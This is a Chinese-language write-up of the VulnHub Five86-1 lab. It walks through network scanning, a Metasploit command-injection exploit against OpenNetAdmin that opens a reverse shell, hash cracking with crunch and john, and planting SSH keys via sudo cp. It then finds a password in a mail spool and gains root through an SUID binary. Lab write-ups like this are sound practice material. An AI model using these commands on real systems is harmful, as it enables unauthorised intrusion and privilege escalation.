vulnhub之Five86-1的實踐
今天實踐的是vulnhub的Five86-1鏡像,
下載地址,https://download.vulnhub.com/five86/Five86-1.zip,
用virtualbox導入成功,
做地址掃描,sudo netdiscover -r 192.168.0.0/24,
獲取到靶機地址192.168.0.117,

繼續做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.117,
獲取到80端口有web服務,且有/ona目錄,

瀏覽器訪問http://192.168.0.117/ona,
獲取到openNetAdmin的版本v18.1.1,

在msf里搜索可利用的漏洞,msfconsole,search openNetAdmin,
use exploit/unix/webapp/opennetadmin_ping_cmd_injection,
查看使用方法,show options,

配置遠程主機和本地主機地址即可,
set RHOSTS 192.168.0.117
set LHOST 192.168.0.192
exploit
獲取到msf shell,getuid確認不是root,
轉成普通shell,shell,
python -c 'import pty;pty.spawn("/bin/bash")',
進入web路徑,查看到用戶名密碼,密碼是hash的,
douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1,
并獲取到密碼的算法提示,

制作密碼字典,crunch 10 10 aefhrt > dict.txt,
把密碼hash保存到文件,vim hash,
破解密碼,john --wordlist=/home/kali/dict.txt hash,
獲取到用戶名密碼,douglas/fatherrrrr,

切換賬號,su douglas,id確認不是root,
sudo -l查看可以用jen權限執行/bin/cp,

把douglas的公鑰拷貝到jen下,
cat id_rsa.pub > /tmp/authorized_keys,cd /tmp,
chmod 777 authorized_keys,
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh,
使用douglas的私鑰做ssh登錄,
cp /home/douglas/.ssh/id_rsa ./,chmod 600 id_rsa,
ssh -i id_rsa jen@127.0.0.1,提示了mail信息,id確認不是root,

進入mail目錄進行查看,cd /var/mail,cat jen,
獲取到用戶名密碼,moss/Fire!Fire!,

切換賬號,su moss,id確認不是root,
查找root權限的程序,find / -perm -u=s -type f 2>/dev/null,
獲取到/home/moss/.games/upyourgame,
執行upyourgame,一路回答問題,獲取到新的shell,id確認是root,
